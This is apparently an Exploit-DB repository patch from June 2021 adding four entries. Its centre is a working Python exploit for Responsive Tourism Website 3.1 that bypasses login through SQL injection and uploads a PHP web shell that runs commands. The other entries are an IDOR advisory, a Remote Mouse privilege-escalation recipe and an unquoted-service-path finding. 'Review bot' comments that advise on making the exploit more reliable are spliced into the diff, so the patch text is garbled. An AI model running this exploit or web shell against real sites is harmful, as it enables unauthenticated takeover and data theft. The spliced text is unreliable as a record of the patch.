From d318d8a2c7d5ba0fe82d888e4a70bd0e7b24a866 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 23 Jun 2021 05:01:58 +0000 Subject: [PATCH] DB: 2021-06-23 4 changes to exploits/shellcodes ASUS DisplayWidget Software 3.4.0.036 - 'ASUSDisplayWidgetService' Unquoted Service Path Responsive Tourism Website 3.1 - Remote Code Execution (RCE) (Unauthenticated) Phone Shop Sales Managements System 1.0 - Insecure Direct Object Reference (IDOR) --- exploits/php/webapps/50049.py | 66 ++++++++++++++++++++++++++++++++ exploits/php/webapps/50050.txt | 25 ++++++++++++ exploits/windows/local/50047.txt | 22 +++++------ exploits/windows/local/50048.txt | 39 +++++++++++++++++++ files_exploits.csv | 3 ++ 5 files changed, 142 insertions(+), 13 deletions(-) create mode 100755 exploits/php/webapps/50049.py create mode 100644 exploits/php/webapps/50050.txt create mode 100644 exploits/windows/local/50048.txt diff --git a/exploits/php/webapps/50049.py b/exploits/php/webapps/50049.py new file mode 100755 index 000000000..9191de952 --- /dev/null +++ b/exploits/php/webapps/50049.py 
@@ -0,0 +1,66 @@ +# Exploit Title: Responsive Tourism Website 3.1 - Remote Code Execution (RCE) (Unauthenticated) +# Date: 22.06.2021 +# Exploit Author: Tagoletta (Tağmaç) +# Software Link: https://www.sourcecodester.com/php/14838/simple-responsive-tourism-website-using-php-free-source-code.html +# Version: V 3.1 +# Tested on: MacOS & Windows + +import requests +import random +import string +from bs4 import BeautifulSoup + +url = input("TARGET = ") + +if not url.startswith('http://') and not url.startswith('https://'): + url = "http://" + url +if not url.endswith('/'): + url = url + "/" + + +session = requests.Session() +session.get(url + 'admin/login.php') + +print("- Bypassing login -") + +login_url = url + "classes/Login.php?f=login" +login_data = {"username": "admin' or '1'='1'#", "password": "admin' or '1'='1'#"} +session.post(login_url, cookies=session.cookies.get_dict(), data=login_data) + +print("- Protecting User -") + +protectSettings_url = url + 'admin/?page=user' +protectSetting_html = session.get(protectSettings_url) +protectSettings_parser = BeautifulSoup(protectSetting_html.text, 'html.parser') + +ids = protectSettings_parser.find('input', {'name':'id'}).get("value") +firstname = protectSettings_parser.find('input', {'id':'firstname'}).get("value") +lastname = protectSettings_parser.find('input', {'id':'lastname'}).get("value") +username = protectSettings_parser.find('input', {'id':'username'}).get("value") + +print("User ID : " + ids) +print("First Name : " + firstname) +print("Last Name : " + lastname) +print("Username : " + username) + +print("- OK -") + +let = string.ascii_lowercase +shellname = ''.join(random.choice(let) for i in range(15)) + +print("Shell uploading") + +upload_url = url + "classes/Users.php?f=save" +upload_headers = {"Accept": "*/*", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary7gB8BDj2OLQBJbBT", "Accept-Encoding": "gzip, deflate", "Accept-Language": 
"tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7", "Connection": "close"} +upload_payload = "Tagoletta
'; $cmd = ($_GET['cmd']); system($cmd); echo '
'; die; } ?>" +upload_data = "------WebKitFormBoundary7gB8BDj2OLQBJbBT\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n"+ids+"\r\n------WebKitFormBoundary7gB8BDj2OLQBJbBT\r\nContent-Disposition: form-data; name=\"firstname\"\r\n\r\n"+firstname+"\r\n------WebKitFormBoundary7gB8BDj2OLQBJbBT\r\nContent-Disposition: form-data; name=\"lastname\"\r\n\r\n"+lastname+"\r\n------WebKitFormBoundary7gB8BDj2OLQBJbBT\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n"+username+"\r\n------WebKitFormBoundary7gB8BDj2OLQBJbBT\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n\r\n------WebKitFormBoundary7gB8BDj2OLQBJbBT\r\nContent-Disposition: form-data; name=\"img\"; filename=\""+shellname+"_Tagoletta.php\"\r\nContent-Type: application/octet-stream\r\n\r\n"+ upload_payload +"\r\n------WebKitFormBoundary7gB8BDj2OLQBJbBT--\r\n" +upload = session.post(upload_url, headers=upload_headers, data=upload_data) + +if upload.status_code == 200: + print("- OK -") + req = session.get(url + "/admin/?page=user", headers=session.headers) + parser = BeautifulSoup(req.text, 'html.parser') + find_shell = parser.find('img', {'id':'cimg'}) + print("Shell URL : " + find_shell.get("src") + "?cmd=whoami") +else: + print("- NO :( -") \ No newline at end of file diff --git a/exploits/php/webapps/50050.txt b/exploits/php/webapps/50050.txt new file mode 100644 index 000000000..04c48f45b --- /dev/null +++ b/exploits/php/webapps/50050.txt 
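Review bot: `ids = protectSettings_parser.find('input', {'name':'id'}).get("value")` and the three `find(...)` lines after it call `.get()` on whatever `find()` returns, so when the SQL-injection login does not yield an admin session (the response to the `classes/Login.php?f=login` POST is never inspected) `find()` returns `None` and the script dies with an AttributeError instead of reporting a failed bypass; guard it, e.g. `id_field = protectSettings_parser.find('input', {'name': 'id'})` followed by `if id_field is None: raise SystemExit('login bypass failed: admin user form not reachable')`. The later `if upload.status_code == 200:` is weak evidence of a successful upload, since nothing visible shows the save endpoint answers with a non-200 status on rejection; fetching the printed shell URL with a harmless command and checking the body is the real confirmation. The `upload_payload =` line looks garbled in this rendering (the PHP open tag and the `<pre>` echo are missing), so verify the committed file still carries a complete `<?php ... ?>` block. Finally, the dropped file executes `$_GET['cmd']` through `system()` with no authentication and is never cleaned up, so the script should at least print a reminder to delete it after the engagement.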
@@ -0,0 +1,25 @@
+# Exploit Title: Phone Shop Sales Managements System 1.0 - Insecure Direct Object Reference (IDOR)
+# Date: 21/06/2021
+# Exploit Author: Pratik Khalane
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/10882/phone-shop-sales-managements-system.html
+# Version: 1.0
+# Tested on: Windows 10 Pro
+
+
+Vulnerability Details
+======================
+
+Steps :
+
+
+1) Log in to the application with the given credentials
+
+Username: kwizera
+Password: 12345
+
+2) Navigate to Invoice and Click on Print Invoice.
+
+3)In /Invoice.php?id=3005, modify the id Parameter to View User details,
+Address,
+Payments, Phone number, and Email of other Users
\ No newline at end of file
diff --git a/exploits/windows/local/50047.txt b/exploits/windows/local/50047.txt
index 008e31170..da0e9af57 100644
--- a/exploits/windows/local/50047.txt
+++ b/exploits/windows/local/50047.txt
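Review bot: Step 3 establishes that `/Invoice.php?id=3005` returns another user's invoice after a login, but the advisory never records whether the same request works without a session, which decides whether this is an authenticated IDOR or unauthenticated exposure of customer PII. Add a step that repeats the request from a fresh browser with no cookies and states the observed result, e.g. `4) Repeat the request in a private window without logging in and record whether the invoice is still returned.`, and say which neighbouring ids were confirmed to belong to other accounts. It would also help to state whether `kwizera / 12345` are the application's shipped default credentials or an account created for the test, since that affects how many deployments are exposed.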
@@ -1,19 +1,15 @@ # Exploit Title: Remote Mouse GUI 3.008 - Local Privilege Escalation -# Exploit Author: Salman Asad (@deathflash1411) +# Exploit Author: Salman Asad (@deathflash1411, salman@defmax.io) # Date: 17.06.2021 # Version: Remote Mouse 3.008 # Tested on: Windows 10 Pro Version 21H1 +# Reference: https://deathflash.ml/blog/remote-mouse-lpe -# Note: Local/RDP access is required to exploit this vulnerability +Steps to reproduce: -This method is also known as Citrix Method (Insecure GUI App) -After installation remote mouse runs as administrator and autostarts by default - -PoC: - -Open remote mouse from the system tray -Go to Settings -Click "Change..." in the "Image Transfer Folder" area -Save As prompt will appear -Enter "C:\Windows\System32\cmd.exe" -Command Prompt is spawned with administrator privileges \ No newline at end of file +1. Open Remote Mouse from the system tray +2. Go to "Settings" +3. Click "Change..." in "Image Transfer Folder" section +4. "Save As" prompt will appear +5. Enter "C:\Windows\System32\cmd.exe" in the address bar +6. A new command prompt is spawned with Administrator privileges \ No newline at end of file diff --git a/exploits/windows/local/50048.txt b/exploits/windows/local/50048.txt new file mode 100644 index 000000000..abb9cec34 --- /dev/null +++ b/exploits/windows/local/50048.txt 
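Review bot: The rewritten steps drop the only precondition the old text carried (`# Note: Local/RDP access is required to exploit this vulnerability` and the sentence that Remote Mouse runs as administrator and autostarts by default), so the new version never explains who can reach the tray icon in step 1 or why step 6 yields an elevated prompt. Restore that context as one line between the header and `Steps to reproduce:`, e.g. `# Note: requires an interactive (local or RDP) session; Remote Mouse autostarts with administrator rights, so anything launched from its Save As dialog inherits them.` The blog URL added on the `# Reference:` line does not substitute for it, since an offline copy of the advisory should stand on its own.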
@@ -0,0 +1,39 @@
+# Exploit Title: ASUS DisplayWidget Software 3.4.0.036 - 'ASUSDisplayWidgetService' Unquoted Service Path
+# Date: 2021-06-21
+# Exploit Author: Julio Aviña
+# Vendor Homepage: https://www.asus.com/
+# Software Link: https://dlcdnets.asus.com/pub/ASUS/LCD%20Monitors/MB16ACE/ASUS_DisplayWidget_3.4.0.036.exe.zip
+# Version: 3.4.0.036
+# Service File Version 1.0.0.1
+# Tested on: Windows 10 Pro x64 es
+# Vulnerability Type: Unquoted Service Path
+
+
+# 1. To find the unquoted service path vulnerability
+
+C:\>wmic service where 'name like "%ASUSDisplayWidgetService%"' get displayname, pathname, startmode, startname
+
+DisplayName PathName StartMode StartName
+ASUS DisplayWidget Service by Portrait Displays C:\Program Files\Portrait Displays\ASUS DisplayWidget\DisplayWidgetService.exe Auto LocalSystem
+
+# 2. To check service info:
+
+C:\>sc qc "ASUSDisplayWidgetService"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: ASUSDisplayWidgetService
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_INICIO : 2 AUTO_START
+ CONTROL_ERROR : 1 NORMAL
+ NOMBRE_RUTA_BINARIO: C:\Program Files\Portrait Displays\ASUS DisplayWidget\DisplayWidgetService.exe
+ GRUPO_ORDEN_CARGA :
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : ASUS DisplayWidget Service by Portrait Displays
+ DEPENDENCIAS :
+ NOMBRE_INICIO_SERVICIO: LocalSystem
+
+
+# 3. Exploit:
+
+A successful attempt to exploit this vulnerability requires the attacker to insert an executable file into the service path undetected by the OS or some security application.
+When restarting the service or the system, the inserted executable will run with elevated privileges.
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index ec004e8c1..6a4ce6723 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
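Review bot: Section `# 3. Exploit:` claims exploitability but never shows that a non-administrative user can create `C:\Program.exe` or `C:\Program Files\Portrait.exe`, which is what the unquoted `C:\Program Files\Portrait Displays\ASUS DisplayWidget\DisplayWidgetService.exe` path makes the Service Control Manager try first; on a default Windows 10 install neither `C:\` nor `C:\Program Files\` is typically writable by standard users, so without an ACL check this is a misconfiguration finding rather than a demonstrated privilege escalation. Add the check to the steps, e.g. `icacls "C:\Program Files"` and `icacls "C:\Program Files\Portrait Displays"`, record the result, and replace "undetected by the OS or some security application" with the concrete precondition that the attacker needs write access to one of those path prefixes. The `sc qc` output does establish the impact once that precondition holds: `AUTO_START` together with `NOMBRE_INICIO_SERVICIO: LocalSystem` means a planted binary runs as SYSTEM at boot, and that is worth saying explicitly. Because the `sc` output is localized, a one-line gloss such as `# NOMBRE_RUTA_BINARIO = BINARY_PATH_NAME, NOMBRE_INICIO_SERVICIO = SERVICE_START_NAME` would help readers who only know the English labels.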
@@ -11379,6 +11379,7 @@ id,file,description,date,author,type,platform,port
 50040,exploits/windows/local/50040.txt,"iFunbox 4.2 - 'Apple Mobile Device Service' Unquoted Service Path",2021-06-21,"Julio Aviña",local,windows,
 50045,exploits/windows/local/50045.txt,"Lexmark Printer Software G2 Installation Package 1.8.0.0 - 'LM__bdsvc' Unquoted Service Path",2021-06-21,"Julio Aviña",local,windows,
 50047,exploits/windows/local/50047.txt,"Remote Mouse GUI 3.008 - Local Privilege Escalation",2021-06-21,"Salman Asad",local,windows,
+50048,exploits/windows/local/50048.txt,"ASUS DisplayWidget Software 3.4.0.036 - 'ASUSDisplayWidgetService' Unquoted Service Path",2021-06-22,"Julio Aviña",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -44195,3 +44196,5 @@ id,file,description,date,author,type,platform,port
 50044,exploits/php/webapps/50044.txt,"Simple CRM 3.0 - 'name' Stored Cross site scripting (XSS)",2021-06-21,"Riadh Benlamine",webapps,php,
 50042,exploits/php/webapps/50042.py,"Websvn 2.6.0 - Remote Code Execution (Unauthenticated)",2021-06-21,g0ldm45k,webapps,php,
 50046,exploits/php/webapps/50046.txt,"Customer Relationship Management System (CRM) 1.0 - Remote Code Execution",2021-06-21,"Ishan Saha",webapps,php,
+50049,exploits/php/webapps/50049.py,"Responsive Tourism Website 3.1 - Remote Code Execution (RCE) (Unauthenticated)",2021-06-22,Tagoletta,webapps,php,
+50050,exploits/php/webapps/50050.txt,"Phone Shop Sales Managements System 1.0 - Insecure Direct Object Reference (IDOR)",2021-06-22,"Pratik Khalane",webapps,php,